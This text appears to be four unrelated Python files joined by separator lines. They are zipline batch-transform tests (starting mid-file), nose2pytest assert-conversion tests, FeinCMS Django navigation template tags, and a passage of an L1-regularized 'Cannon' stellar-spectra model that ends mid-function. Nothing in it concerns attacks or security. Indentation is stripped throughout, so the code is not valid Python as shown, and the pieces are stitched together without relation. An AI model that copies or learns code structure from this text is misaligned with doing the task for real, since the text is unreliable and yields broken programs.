end=datetime(1990, 1, 8, tzinfo=pytz.utc)
)
def test_all_sids_passed(self):
algo = BatchTransformAlgorithmSetSid(
sim_params=self.sim_params,
identifiers=[i for i in range(0, 90)]
)
source = DifferentSidSource()
algo.run(source)
for i, (df, date) in enumerate(zip(algo.history, source.trading_days)):
self.assertEqual(df.index[-1], date, "Newest event doesn't \
match.")
for sid in self.sids[:i]:
self.assertIn(sid, df.columns)
self.assertEqual(df.iloc[-1].iloc[-1], i)
class TestBatchTransformMinutely(TestCase):
def setUp(self):
setup_logger(self)
start = pd.datetime(1990, 1, 3, 0, 0, 0, 0, pytz.utc)
end = pd.datetime(1990, 1, 8, 0, 0, 0, 0, pytz.utc)
self.sim_params = factory.create_simulation_parameters(
start=start,
end=end,
)
self.sim_params.emission_rate = 'daily'
self.sim_params.data_frequency = 'minute'
self.source, self.df = \
factory.create_test_df_source(bars='minute')
def tearDown(self):
teardown_logger(self)
def test_core(self):
algo = BatchTransformAlgorithmMinute(sim_params=self.sim_params)
algo.run(self.source)
wl = int(algo.window_length * 6.5 * 60)
for bt in algo.history[wl:]:
self.assertEqual(len(bt), wl)
def test_window_length(self):
algo = BatchTransformAlgorithmMinute(sim_params=self.sim_params,
window_length=1, refresh_period=0)
algo.run(self.source)
wl = int(algo.window_length * 6.5 * 60)
np.testing.assert_array_equal(algo.history[:(wl - 1)],
[None] * (wl - 1))
for bt in algo.history[wl:]:
self.assertEqual(len(bt), wl)
class TestBatchTransform(TestCase):
def setUp(self):
setup_logger(self)
self.sim_params = factory.create_simulation_parameters(
start=datetime(1990, 1, 1, tzinfo=pytz.utc),
end=datetime(1990, 1, 8, tzinfo=pytz.utc)
)
self.source, self.df = \
factory.create_test_df_source(self.sim_params)
def tearDown(self):
teardown_logger(self)
def test_core_functionality(self):
algo = BatchTransformAlgorithm(sim_params=self.sim_params)
algo.run(self.source)
wl = algo.window_length
# The following assertion depend on window length of 3
self.assertEqual(wl, 3)
# If window_length is 3, there should be 2 None events, as the
# window fills up on the 3rd day.
n_none_events = 2
self.assertEqual(algo.history_return_price_class[:n_none_events],
[None] * n_none_events,
"First two iterations should return None." + "\n" +
"i.e. no returned values until window is full'" +
"%s" % (algo.history_return_price_class,))
self.assertEqual(algo.history_return_price_decorator[:n_none_events],
[None] * n_none_events,
"First two iterations should return None." + "\n" +
"i.e. no returned values until window is full'" +
"%s" % (algo.history_return_price_decorator,))
# After three Nones, the next value should be a data frame
self.assertTrue(isinstance(
algo.history_return_price_class[wl],
pd.DataFrame)
)
# Test whether arbitrary fields can be added to datapanel
field = algo.history_return_arbitrary_fields[-1]
self.assertTrue(
'arbitrary' in field.items,
'datapanel should contain column arbitrary'
)
self.assertTrue(all(
field['arbitrary'].values.flatten() ==
[123] * algo.window_length),
'arbitrary dataframe should contain only "test"'
)
for data in algo.history_return_sid_filter[wl:]:
self.assertIn(0, data.columns)
self.assertNotIn(1, data.columns)
for data in algo.history_return_field_filter[wl:]:
self.assertIn('price', data.items)
self.assertNotIn('ignore', data.items)
for data in algo.history_return_field_no_filter[wl:]:
self.assertIn('price', data.items)
self.assertIn('ignore', data.items)
for data in algo.history_return_ticks[wl:]:
self.assertTrue(isinstance(data, deque))
for data in algo.history_return_not_full:
self.assertIsNot(data, None)
# test overloaded class
for test_history in [algo.history_return_price_class,
algo.history_return_price_decorator]:
# starting at window length, the window should contain
# consecutive (of window length) numbers up till the end.
for i in range(algo.window_length, len(test_history)):
np.testing.assert_array_equal(
range(i - algo.window_length + 2, i + 2),
test_history[i].values.flatten()
)
def test_passing_of_args(self):
algo = BatchTransformAlgorithm(1, kwarg='str',
sim_params=self.sim_params)
algo.run(self.source)
self.assertEqual(algo.args, (1,))
self.assertEqual(algo.kwargs, {'kwarg': 'str'})
expected_item = ((1, ), {'kwarg': 'str'})
self.assertEqual(
algo.history_return_args,
[
# 1990-01-01 - market holiday, no event
# 1990-01-02 - window not full
None,
# 1990-01-03 - window not full
None,
# 1990-01-04 - window now full, 3rd event
expected_item,
# 1990-01-05 - window now full
expected_item,
# 1990-01-08 - window now full
expected_item
])
def run_batchtransform(window_length=10):
sim_params = factory.create_simulation_parameters(
start=datetime(1990, 1, 1, tzinfo=pytz.utc),
end=datetime(1995, 1, 8, tzinfo=pytz.utc)
)
source, df = factory.create_test_df_source(sim_params)
return_price_class = ReturnPriceBatchTransform(
refresh_period=1,
window_length=window_length,
clean_nans=False
)
for raw_event in source:
raw_event['datetime'] = raw_event.dt
event = {0: raw_event}
return_price_class.handle_data(event)
|
|
import logging
import sys
from logging import StreamHandler
from textwrap import dedent
import pytest
from nose2pytest.script import NoseConversionRefactoringTool
log = logging.getLogger('nose2pytest')
nosetools = {}
pytesttools = {}
refac = NoseConversionRefactoringTool()
@pytest.fixture(scope="session", autouse=True)
def setup_log():
redirect = StreamHandler(stream=sys.stdout)
redirect.setLevel(logging.DEBUG)
log.addHandler(redirect)
log.setLevel(logging.DEBUG)
import nose.tools
for name, val in vars(nose.tools).items():
if name.startswith('assert_'):
nosetools[name] = val
import re, collections
pytesttools['re'] = re
pytesttools['collections'] = collections
def check_transformation(input, expect):
result = refac.refactor_string(dedent(input + '\n'), 'script')
assert dedent(expect + '\n') == str(result)
def check_passes(refac, statement_in, expect_out):
result = refac.refactor_string(statement_in + '\n', 'script')
statement_out = str(result)
exec(statement_in, nosetools)
exec(statement_out, pytesttools)
assert statement_out == expect_out + '\n'
def check_fails(refac, statement_in, expect_out):
result = refac.refactor_string(statement_in + '\n', 'script')
statement_out = str(result)
pytest.raises(AssertionError, exec, statement_in, nosetools)
pytest.raises(AssertionError, exec, statement_out, pytesttools)
assert statement_out == expect_out + '\n'
class Test1Arg:
def test_params(self):
test_script = """
log.print("hi")
assert_true(a)
assert_true(a, 'text')
assert_true(a, msg='text')
"""
check_transformation(test_script, """
log.print("hi")
assert a
assert a, 'text'
assert a, 'text'
""")
def test_parens(self):
check_transformation('assert_true(a + \nb)', 'assert (a + \nb)')
def test_generator(self):
check_transformation('assert_true(x for x in range(1))', 'assert (x for x in range(1))')
def test_same_results(self):
check_passes(refac, 'assert_true(True)', 'assert True')
check_fails(refac, 'assert_true(False)', 'assert False')
check_passes(refac, 'assert_false(False)', 'assert not False')
check_fails(refac, 'assert_false(True)', 'assert not True')
check_passes(refac, 'assert_is_none(None)', 'assert None is None')
check_fails(refac, 'assert_is_none("")', 'assert "" is None')
check_passes(refac, 'assert_is_not_none("")', 'assert "" is not None')
check_fails(refac, 'assert_is_not_none(None)', 'assert None is not None')
class Test2Args:
def test_params(self):
test_script = """
assert_in(a, b)
assert_in(a, b, 'text')
assert_in(a, b, msg='text')
"""
check_transformation(test_script, """
assert a in b
assert a in b, 'text'
assert a in b, 'text'
""")
def test_dont_add_parens(self):
check_transformation('assert_in(a, c)',
'assert a in c')
check_transformation('assert_in(a.b, c)',
'assert a.b in c')
check_transformation('assert_in(a.b(), c)',
'assert a.b() in c')
check_transformation('assert_in(a(), d)',
'assert a() in d')
check_transformation('assert_in(a[1], d)',
'assert a[1] in d')
check_transformation('assert_in((a+b), d)',
'assert (a+b) in d')
check_transformation('assert_in((a+b), d)',
'assert (a+b) in d')
check_transformation('assert_in(-a, +b)',
'assert -a in +b')
def test_add_parens(self):
check_transformation('assert_in(a == b, d)',
'assert (a == b) in d')
check_transformation('assert_in(a != b, d)',
'assert (a != b) in d')
check_transformation('assert_in(b <= c, d)',
'assert (b <= c) in d')
check_transformation('assert_in(c >= d, d)',
'assert (c >= d) in d')
check_transformation('assert_in(d < e, d)',
'assert (d < e) in d')
check_transformation('assert_in(d > e, d)',
'assert (d > e) in d')
check_transformation('assert_equal(a in b, c)',
'assert (a in b) == c')
check_transformation('assert_equal(a not in b, c)',
'assert (a not in b) == c')
check_transformation('assert_equal(a is b, c)',
'assert (a is b) == c')
check_transformation('assert_equal(a is not b, c)',
'assert (a is not b) == c')
check_transformation('assert_equal(not a, c)',
'assert (not a) == c')
check_transformation('assert_equal(a and b, c or d)',
'assert (a and b) == (c or d)')
check_transformation('assert_in(a.b + c, d)',
'assert a.b + c in d')
check_transformation('assert_in(a() + b, d)',
'assert a() + b in d')
check_transformation('assert_in(a + b, c + d)',
'assert a + b in c + d')
check_transformation('assert_in(a + b, c + d, "text")',
'assert a + b in c + d, "text"')
check_transformation('assert_equal(a + b if c + d < 0 else e + f if g+h < 0 else i + j, -100)',
'assert (a + b if c + d < 0 else e + f if g+h < 0 else i + j) == -100')
def test_newline_all(self):
test_script = """
assert_in(long_a,
long_b)
"""
check_transformation(test_script, """
assert (long_a in
long_b)
""")
test_script = """
assert_in(
long_a, long_b)
"""
check_transformation(test_script, """
assert (
long_a in long_b)
""")
test_script = """
assert_in(long_a,
long_b + something)
"""
check_transformation(test_script, """
assert (long_a in
long_b + something)
""")
test_script = """
assert_in(long_a,
long_b > something)
"""
check_transformation(test_script, """
assert (long_a in
(long_b > something))
""")
test_script = """
assert_in(a, long_b +
something)
"""
check_transformation(test_script, """
assert (a in long_b +
something)
""")
def test_same_results(self):
check_passes(refac, 'assert_equal(123, 123)', 'assert 123 == 123')
check_fails(refac, 'assert_equal(123, 456)', 'assert 123 == 456')
check_passes(refac, 'assert_equals(123, 123)', 'assert 123 == 123')
check_fails(refac, 'assert_equals(123, 456)', 'assert 123 == 456')
check_passes(refac, 'assert_not_equal(123, 456)', 'assert 123 != 456')
check_fails(refac, 'assert_not_equal(123, 123)', 'assert 123 != 123')
check_passes(refac, 'assert_not_equals(123, 456)', 'assert 123 != 456')
check_fails(refac, 'assert_not_equals(123, 123)', 'assert 123 != 123')
check_passes(refac, 'assert_list_equal([123, 456], [123, 456])', 'assert [123, 456] == [123, 456]')
check_fails(refac, 'assert_list_equal([123, 123], [123, 456])', 'assert [123, 123] == [123, 456]')
check_passes(refac, 'assert_tuple_equal((123, 456), (123, 456))', 'assert (123, 456) == (123, 456)')
check_fails(refac, 'assert_tuple_equal((123, 123), (123, 456))', 'assert (123, 123) == (123, 456)')
check_passes(refac, 'assert_set_equal({123, 456}, {123, 456})', 'assert {123, 456} == {123, 456}')
check_fails(refac, 'assert_set_equal({123, 123}, {123, 456})', 'assert {123, 123} == {123, 456}')
check_passes(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, b=456))', 'assert dict(a=123, b=456) == dict(a=123, b=456)')
check_fails(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, b=123))', 'assert dict(a=123, b=456) == dict(a=123, b=123)')
check_fails(refac, 'assert_dict_equal(dict(a=123, b=456), dict(a=123, c=456))', 'assert dict(a=123, b=456) == dict(a=123, c=456)')
check_passes(refac, 'assert_multi_line_equal("""1\n2\n""", """1\n2\n""")', 'assert """1\n2\n""" == """1\n2\n"""')
check_fails(refac, 'assert_multi_line_equal("""1\n2\n""", """1\n3\n""")', 'assert """1\n2\n""" == """1\n3\n"""')
check_passes(refac, 'assert_greater(123, 1)', 'assert 123 > 1' )
check_fails(refac, 'assert_greater(123, 123)', 'assert 123 > 123')
check_fails(refac, 'assert_greater(123, 456)', 'assert 123 > 456')
check_passes(refac, 'assert_greater_equal(123, 1)', 'assert 123 >= 1' )
check_passes(refac, 'assert_greater_equal(123, 123)', 'assert 123 >= 123')
check_fails(refac, 'assert_greater_equal(123, 456)', 'assert 123 >= 456')
check_passes(refac, 'assert_less(123, 456)', 'assert 123 < 456')
check_fails(refac, 'assert_less(123, 123)', 'assert 123 < 123')
check_fails(refac, 'assert_less(123, 1)', 'assert 123 < 1' )
check_passes(refac, 'assert_less_equal(123, 456)', 'assert 123 <= 456')
check_passes(refac, 'assert_less_equal(123, 123)', 'assert 123 <= 123')
check_fails(refac, 'assert_less_equal(123, 1)' , 'assert 123 <= 1' )
check_passes(refac, 'assert_in(123, [123, 456])', 'assert 123 in [123, 456]')
check_fails(refac, 'assert_in(123, [789, 456])', 'assert 123 in [789, 456]')
check_passes(refac, 'assert_not_in(123, [789, 456])', 'assert 123 not in [789, 456]')
check_fails(refac, 'assert_not_in(123, [123, 456])', 'assert 123 not in [123, 456]')
check_passes(refac, 'assert_is(123, 123)', 'assert 123 is 123')
check_fails(refac, 'assert_is(123, 1)', 'assert 123 is 1')
check_passes(refac, 'assert_is_not(123, 1)', 'assert 123 is not 1')
check_fails(refac, 'assert_is_not(123, 123)', 'assert 123 is not 123')
check_passes(refac, 'assert_is_instance(123, int)', 'assert isinstance(123, int)')
check_fails(refac, 'assert_is_instance(123, float)', 'assert isinstance(123, float)')
check_passes(refac, 'assert_count_equal([456, 789, 456], [456, 456, 789])',
'assert collections.Counter([456, 789, 456]) == collections.Counter([456, 456, 789])')
check_fails(refac, 'assert_count_equal([789, 456], [456])',
'assert collections.Counter([789, 456]) == collections.Counter([456])')
check_passes(refac, 'assert_regex("125634", "12.*34")', 'assert re.search("12.*34","125634")')
check_fails(refac, 'assert_regex("125678", "12.*34")', 'assert re.search("12.*34","125678")')
check_passes(refac, 'assert_not_regex("125678", "12.*34")', 'assert not re.search("12.*34","125678")')
check_fails(refac, 'assert_not_regex("125634", "12.*34")', 'assert not re.search("12.*34","125634")')
class Test3Args:
def test_no_add_parens(self):
check_transformation('assert_almost_equal(a * b, ~c, delta=d**e)', 'assert abs(a * b - ~c) <= d**e')
def test_add_parens(self):
check_transformation('assert_almost_equal(a + b, c, delta=d>e)', 'assert abs((a + b) - c) <= (d>e)')
check_transformation('assert_almost_equal(a | b, c ^ d, delta=0.1)', 'assert abs((a | b) - (c ^ d)) <= 0.1')
check_transformation('assert_almost_equal(a & b, c << d, delta=0.1)', 'assert abs((a & b) - (c << d)) <= 0.1')
check_transformation('assert_almost_equal(a or b, c >> d, delta=0.1)', 'assert abs((a or b) - (c >> d)) <= 0.1')
def test_almost_equal(self):
check_passes(refac, 'assert_almost_equal(123.456, 123.5, delta=0.1)', 'assert abs(123.456 - 123.5) <= 0.1')
check_passes(refac, 'assert_almost_equal(123.456, 123.5, delta=0.2, msg="text")', 'assert abs(123.456 - 123.5) <= 0.2, "text"')
check_passes(refac, 'assert_almost_equal(123.456, 123.5, msg="text", delta=0.3)', 'assert abs(123.456 - 123.5) <= 0.3, "text"')
check_fails(refac, 'assert_almost_equal(123.456, 124, delta=0.1)', 'assert abs(123.456 - 124) <= 0.1')
check_passes(refac, 'assert_almost_equals(123.456, 123.5, delta=0.1)', 'assert abs(123.456 - 123.5) <= 0.1')
check_passes(refac, 'assert_almost_equals(123.456, 123.5, delta=0.2, msg="text")', 'assert abs(123.456 - 123.5) <= 0.2, "text"')
check_passes(refac, 'assert_almost_equals(123.456, 123.5, msg="text", delta=0.3)', 'assert abs(123.456 - 123.5) <= 0.3, "text"')
check_fails(refac, 'assert_almost_equals(123.456, 124, delta=0.1)', 'assert abs(123.456 - 124) <= 0.1')
check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, delta=0.01)', 'assert abs(123.456 - 123.5) > 0.01')
check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, delta=0.02, msg="text")', 'assert abs(123.456 - 123.5) > 0.02, "text"')
check_passes(refac, 'assert_not_almost_equal(123.456, 123.5, msg="text", delta=0.03)', 'assert abs(123.456 - 123.5) > 0.03, "text"')
check_fails(refac, 'assert_not_almost_equal(123.456, 124, delta=0.6)', 'assert abs(123.456 - 124) > 0.6')
check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, delta=0.01)', 'assert abs(123.456 - 123.5) > 0.01')
check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, delta=0.02, msg="text")', 'assert abs(123.456 - 123.5) > 0.02, "text"')
check_passes(refac, 'assert_not_almost_equals(123.456, 123.5, msg="text", delta=0.03)', 'assert abs(123.456 - 123.5) > 0.03, "text"')
check_fails(refac, 'assert_not_almost_equals(123.456, 124, delta=0.6)', 'assert abs(123.456 - 124) > 0.6')
def test_ignore_places(self):
statement_in = 'assert_almost_equal(123.456, 123.5, 2)'
check_transformation(statement_in, statement_in)
statement_in = 'assert_almost_equal(123.456, 123.5, places=2)'
check_transformation(statement_in, statement_in)
class TestAssertTools:
def test_almost(self):
from pytest import assert_almost_equal, assert_not_almost_equal
assert_almost_equal(1, 1.00001, 4)
assert_not_almost_equal(1, 1.01, 3)
pytest.raises(AssertionError, assert_almost_equal, 1, 1.01, 5)
pytest.raises(AssertionError, assert_not_almost_equal, 1, 1.00001, 2)
# assert_almost_equal(1, 1.01, 5)
# assert_not_almost_equal(1, 1.00001, 2)
def test_dict_keys_subset(self):
dict1 = dict(a=1, b=2, c=3)
# check keys are subset:
dict2 = dict1.copy()
pytest.assert_dict_contains_subset(dict1, dict2)
dict2['d'] = 4
pytest.assert_dict_contains_subset(dict1, dict2)
del dict2['a']
pytest.raises(AssertionError, pytest.assert_dict_contains_subset, dict1, dict2)
# assert_dict_contains_subset(dict1, dict2)
def test_dict_values_subset(self):
dict1 = dict(a=1, b=2, c=3)
# check keys are subset:
dict2 = dict1.copy()
dict2['d'] = 4
dict2['a'] = 4
pytest.raises(AssertionError, pytest.assert_dict_contains_subset, dict1, dict2)
# assert_dict_contains_subset(dict1, dict2)
|
|
from django import template
from django.conf import settings
from django.http import HttpRequest
from feincms.module.page.models import Page, PageManager
from feincms.utils.templatetags import *
from feincms.utils.templatetags import _parse_args
register = template.Library()
class NavigationNode(SimpleAssignmentNodeWithVarAndArgs):
"""
Return a list of pages to be used for the navigation
level: 1 = toplevel, 2 = sublevel, 3 = sub-sublevel
depth: 1 = only one level, 2 = subpages too
extended: run navigation extension on returned pages, not only on top-level node
If you set depth to something else than 1, you might want to look into
the tree_info template tag from the mptt_tags library.
Example::
{% feincms_navigation of feincms_page as sublevel level=2,depth=1 %}
{% for p in sublevel %}
<a href="{{ p.get_absolute_url }}">{{ p.title }}</a>
{% endfor %}
"""
def what(self, instance, args):
level = int(args.get('level', 1))
depth = int(args.get('depth', 1))
if isinstance(instance, HttpRequest):
instance = Page.objects.from_request(instance)
entries = self._what(instance, level, depth)
if args.get('extended', False):
_entries = list(entries)
entries = []
for entry in _entries:
entries.append(entry)
if getattr(entry, 'navigation_extension', None):
entries.extend(entry.extended_navigation(depth=depth,
request=self.render_context.get('request', None)))
return entries
def _what(self, instance, level, depth):
if level <= 1:
if depth == 1:
return Page.objects.toplevel_navigation()
else:
return Page.objects.in_navigation().filter(level__lt=depth)
# mptt starts counting at 0, NavigationNode at 1; if we need the submenu
# of the current page, we have to add 2 to the mptt level
if instance.__class__.__name__ != 'PagePretender':
if instance.level + 2 == level:
pass
elif instance.level + 2 < level:
try:
queryset = instance.get_descendants().filter(level=level - 2, in_navigation=True)
instance = PageManager.apply_active_filters(queryset)[0]
except IndexError:
return []
else:
instance = instance.get_ancestors()[level - 2]
# special case for the navigation extension
if getattr(instance, 'navigation_extension', None):
return instance.extended_navigation(depth=depth,
request=self.render_context.get('request', None))
else:
if depth == 1:
try:
if instance.__class__.__name__ == 'PagePretender':
return instance.children
else:
return instance.children.in_navigation()
except:
return []
else:
queryset = instance.get_descendants().filter(level__lte=instance.level + depth, in_navigation=True)
return PageManager.apply_active_filters(queryset)
register.tag('feincms_navigation', do_simple_assignment_node_with_var_and_args_helper(NavigationNode))
class ExtendedNavigationNode(NavigationNode):
def render(self, context):
self.render_context = context
try:
instance = self.in_var.resolve(context)
except template.VariableDoesNotExist:
context[self.var_name] = []
return ''
context[self.var_name] = self.what(instance, _parse_args(self.args, context))
return ''
register.tag('feincms_navigation_extended', do_simple_assignment_node_with_var_and_args_helper(ExtendedNavigationNode))
# ------------------------------------------------------------------------
class ParentLinkNode(SimpleNodeWithVarAndArgs):
"""
{% feincms_parentlink of feincms_page level=1 %}
"""
def what(self, page, args):
level = int(args.get('level', 1))
if page.level + 1 == level:
return page.get_absolute_url()
elif page.level + 1 < level:
return '#'
try:
return page.get_ancestors()[level - 1].get_absolute_url()
except IndexError:
return '#'
register.tag('feincms_parentlink', do_simple_node_with_var_and_args_helper(ParentLinkNode))
# ------------------------------------------------------------------------
class LanguageLinksNode(SimpleAssignmentNodeWithVarAndArgs):
"""
::
{% feincms_languagelinks for feincms_page as links [args] %}
This template tag needs the translations extension.
Arguments can be any combination of:
* all or existing: Return all languages or only those where a translation exists
* excludecurrent: Excludes the item in the current language from the list
The default behavior is to return an entry for all languages including the
current language.
Example::
{% feincms_languagelinks for entry as links all,excludecurrent %}
{% for key, name, link in links %}
<a href="{% if link %}{{ link }}{% else %}/{{ key }}/{% endif %}">{% trans name %}</a>
{% endfor %}
"""
def what(self, page, args):
only_existing = args.get('existing', False)
exclude_current = args.get('excludecurrent', False)
# Preserve the trailing path when switching languages if extra_path
# exists (this is mostly the case when we are working inside an
# ApplicationContent-managed page subtree)
trailing_path = u''
request = args.get('request', None)
if request:
# Trailing path without first slash
trailing_path = request._feincms_extra_context.get('extra_path', '')[1:]
translations = dict((t.language, t) for t in page.available_translations())
translations[page.language] = page
links = []
for key, name in settings.LANGUAGES:
if exclude_current and key == page.language:
continue
# hardcoded paths... bleh
if key in translations:
links.append((key, name, translations[key].get_absolute_url()+trailing_path))
elif not only_existing:
links.append((key, name, None))
return links
register.tag('feincms_languagelinks', do_simple_assignment_node_with_var_and_args_helper(LanguageLinksNode))
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------
def _translate_page_into(page, language, default=None):
"""
Return the translation for a given page
"""
# Optimisation shortcut: No need to dive into translations if page already what we want
if page.language == language:
return page
translations = dict((t.language, t) for t in page.available_translations())
translations[page.language] = page
if language in translations:
return translations[language]
else:
if hasattr(default, '__call__'):
return default(page=page)
return default
# ------------------------------------------------------------------------
class TranslatedPageNode(SimpleAssignmentNodeWithVarAndArgs):
"""
::
{% feincms_translatedpage for feincms_page as feincms_transpage language=en %}
{% feincms_translatedpage for feincms_page as originalpage %}
{% feincms_translatedpage for some_page as translatedpage language=feincms_page.language %}
This template tag needs the translations extension.
Returns the requested translation of the page if it exists. If the language
argument is omitted the primary language will be returned (the first language
specified in settings.LANGUAGES).
Note: To distinguish between a bare language code and a variable we check whether
settings LANGUAGES contains that code -- so naming a variable "en" will probably
not do what is intended.
"""
def what(self, page, args, default=None):
language = args.get('language',False)
if not language:
language = settings.LANGUAGES[0][0]
elif language not in (x[0] for x in settings.LANGUAGES):
language = template.Variable(language).resolve(self.render_context)
return _translate_page_into(page, language, default=default)
register.tag('feincms_translatedpage', do_simple_assignment_node_with_var_and_args_helper(TranslatedPageNode))
# ------------------------------------------------------------------------
class TranslatedPageNodeOrBase(TranslatedPageNode):
def what(self, page, args):
return super(TranslatedPageNodeOrBase, self).what(page, args, default=page.get_original_translation)
register.tag('feincms_translatedpage_or_base', do_simple_assignment_node_with_var_and_args_helper(TranslatedPageNodeOrBase))
# ------------------------------------------------------------------------
@register.filter
def feincms_translated_or_base(pages, language=None):
if not hasattr(pages, '__iter__'):
pages = [ pages ]
for page in pages:
yield _translate_page_into(page, language, default=page.get_original_translation)
# ------------------------------------------------------------------------
@register.inclusion_tag("breadcrumbs.html")
def feincms_breadcrumbs(page, include_self=True):
"""
Generate a list of the page's ancestors suitable for use as breadcrumb navigation.
By default, generates an unordered list with the id "breadcrumbs" -
override breadcrumbs.html to change this.
::
{% feincms_breadcrumbs feincms_page %}
"""
if not page or not isinstance(page, Page):
raise ValueError("feincms_breadcrumbs must be called with a valid Page object")
ancs = page.get_ancestors()
bc = [(anc.get_absolute_url(), anc.short_title()) for anc in ancs]
if include_self:
bc.append((None, page.short_title()))
return {"trail": bc}
# ------------------------------------------------------------------------
@register.filter
def is_parent_of(page1, page2):
"""
Determines whether a given page is the parent of another page
Example::
{% if page|is_parent_of:feincms_page %} ... {% endif %}
"""
try:
return page1.tree_id == page2.tree_id and page1.lft < page2.lft and page1.rght > page2.rght
except AttributeError:
return False
# ------------------------------------------------------------------------
@register.filter
def is_equal_or_parent_of(page1, page2):
try:
return page1.tree_id == page2.tree_id and page1.lft <= page2.lft and page1.rght >= page2.rght
except AttributeError:
return False
# ------------------------------------------------------------------------
@register.filter
def is_sibling_of(page1, page2):
"""
Determines whether a given page is a sibling of another page
::
{% if page|is_sibling_of:feincms_page %} ... {% endif %}
"""
try:
return page1.parent_id == page2.parent_id
except AttributeError:
return False
# ------------------------------------------------------------------------
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A regularized (compressed sensing) version of The Cannon.
"""
from __future__ import (division, print_function, absolute_import,
unicode_literals)
__all__ = ["L1RegularizedCannonModel"]
import logging
import numpy as np
import scipy.optimize as op
from . import (cannon, utils)
logger = logging.getLogger(__name__)
class L1RegularizedCannonModel(cannon.CannonModel):
"""
A L1-regularized edition of The Cannon model for the estimation of arbitrary
stellar labels.
:param labelled_set:
A set of labelled objects. The most common input form is a table with
columns as labels, and stars/objects as rows.
:type labelled_set:
:class:`~astropy.table.Table`, numpy structured array
:param normalized_flux:
An array of normalized fluxes for stars in the labelled set, given as
shape `(num_stars, num_pixels)`. The `num_stars` should match the number
of rows in `labelled_set`.
:type normalized_flux:
:class:`np.ndarray`
:param normalized_ivar:
An array of inverse variances on the normalized fluxes for stars in the
labelled set. The shape of the `normalized_ivar` array should match that
of `normalized_flux`.
:type normalized_ivar:
:class:`np.ndarray`
:param dispersion: [optional]
The dispersion values corresponding to the given pixels. If provided,
this should have length `num_pixels`.
:param threads: [optional]
Specify the number of parallel threads to use. If `threads > 1`, the
training and prediction phases will be automagically parallelised.
:param pool: [optional]
Specify an optional multiprocessing pool to map jobs onto.
This argument is only used if specified and if `threads > 1`.
"""
_descriptive_attributes \
= ["_dispersion", "_vectorizer", "_censors", "_regularization"]
def __init__(self, *args, **kwargs):
super(L1RegularizedCannonModel, self).__init__(*args, **kwargs)
@property
def regularization(self):
"""
Return the regularization term for this model.
"""
return self._regularization
@regularization.setter
def regularization(self, regularization):
"""
Specify the regularization term fot the model, either as a single value
or a per-pixel value.
:param regularization:
The L1-regularization term for the model.
"""
if regularization is None:
self._regularization = None
return None
regularization = np.array(regularization).flatten()
if regularization.size == 1:
regularization = np.ones_like(self.dispersion) * regularization[0]
elif regularization.size != len(self.dispersion):
raise ValueError("regularization must be a positive value or "
"an array of positive values for each pixel "
"({0} != {1})".format(regularization.size,
len(self.dispersion)))
if any(0 > regularization) \
or not np.all(np.isfinite(regularization)):
raise ValueError("regularization terms must be "
"positive and finite")
self._regularization = regularization
return None
def train(self, fixed_scatter=True, **kwargs):
"""
Train the model based on the labelled set using the given vectorizer.
:param fixed_scatter: [optional]
Fix the scatter terms and do not solve for them during the training
phase. If set to `True`, the `s2` attribute must be already set.
"""
kwds = {
"fixed_scatter": fixed_scatter,
"function": _fit_regularized_pixel,
"additional_args": [self.regularization, ]
}
kwds.update(kwargs)
super(L1RegularizedCannonModel, self).train(**kwds)
def check(self):
print("Let's rock!")
def chi_sq(theta, design_matrix, data, ivar, axis=None, gradient=True):
"""
Calculate the chi-squared difference between the spectral model and data.
"""
residuals = np.dot(theta, design_matrix.T) - data
f = np.sum(ivar * residuals**2, axis=axis)
if not gradient:
return f
g = 2.0 * np.dot(design_matrix.T, ivar * residuals)
return (f, g)
def L1Norm(Q):
"""
Return the L1 normalization of Q and its derivative.
:param Q:
An array of finite values.
"""
return (np.sum(np.abs(Q)), np.sign(Q))
def _objective_function_for_a_regularized_pixel_with_fixed_scatter(theta,
normalized_flux, adjusted_ivar, regularization, design_matrix,
gradient=True):
"""
The objective function for a single regularized pixel with fixed scatter.
:param theta:
The theta parameters to solve for.
:param normalized_flux:
The normalized flux values for a single pixel across many stars.
:param adjusted_ivar:
The adjusted inverse variance of the normalized flux values for a single
pixel across many stars. This adjusted inverse variance array should
already have the scatter included.
:param regularization:
The regularization term to scale the L1 norm of theta with.
:param design_matrix:
The design matrix for the model.
:param gradient: [optional]
Also return the analytic derivative of the objective function.
"""
csq, d_csq = chi_sq(theta, design_matrix, normalized_flux, adjusted_ivar)
L1, d_L1 = L1Norm(theta)
# We are using a variation of L1 norm that ignores the first coefficient.
L1 -= np.abs(theta[0])
f = csq + regularization * L1
if not gradient:
return f
g = d_csq + regularization * d_L1
return (f, g)
def _fit_regularized_pixel(initial_theta, initial_s2, normalized_flux,
normalized_ivar, censoring_mask, regularization, design_matrix,
fixed_scatter, **kwargs):
# Any actual information in these pixels?
if np.sum(normalized_ivar) < 1. * normalized_ivar.size: # MAGIC
fiducial_theta = np.hstack([1, np.zeros(censoring_mask.size - 1)])
metadata = { "message": "No pixel information." }
return (np.hstack([fiducial_theta, np.inf]), metadata)
# Unpack (and mask) the design matrix.
design_matrix = utils._unpack_value(design_matrix)[:, censoring_mask]
# Set up the method and arguments.
if fixed_scatter:
func = _objective_function_for_a_regularized_pixel_with_fixed_scatter
adjusted_ivar = normalized_ivar/(1. + normalized_ivar * initial_s2)
args = (
normalized_flux,
adjusted_ivar,
regularization,
design_matrix
)
else:
raise WTF
#p0 = np.hstack([initial_theta, scatter])
#func = _fit_pixel_with_fixed_regularization
#args = (normalized_flux, normalized_ivar, regularization, design_matrix)
# Set up the initial theta value.
if initial_theta is None:
initial_theta, _, __ = cannon._fit_theta(
normalized_flux, normalized_ivar, initial_s2, design_matrix)
# If the initial_theta is the same size as the censored_mask, but different
# to the design_matrix, then we need to censor the initial theta.
if initial_theta.size == censoring_mask.size \
and initial_theta.size != censoring_mask.sum():
# Censor the initial theta.
# Note: the fiducial theta (below) will have the correct size because
# the design matrix is already censored.
initial_theta = initial_theta[censoring_mask]
# Is the fiducial theta a better starting point?
fiducial_theta = np.hstack([1, np.zeros(design_matrix.shape[1] - 1)])
# dimension for theta is 1*10 for each pixel
if func(fiducial_theta, *args)[0] < func(initial_theta, *args)[0]:
initial_theta = fiducial_theta
# Starting point for optimization.
p0 = np.array(initial_theta) if fixed_scatter \
else np.hstack([initial_theta, initial_s2])
# Prepare keywords for optimization.
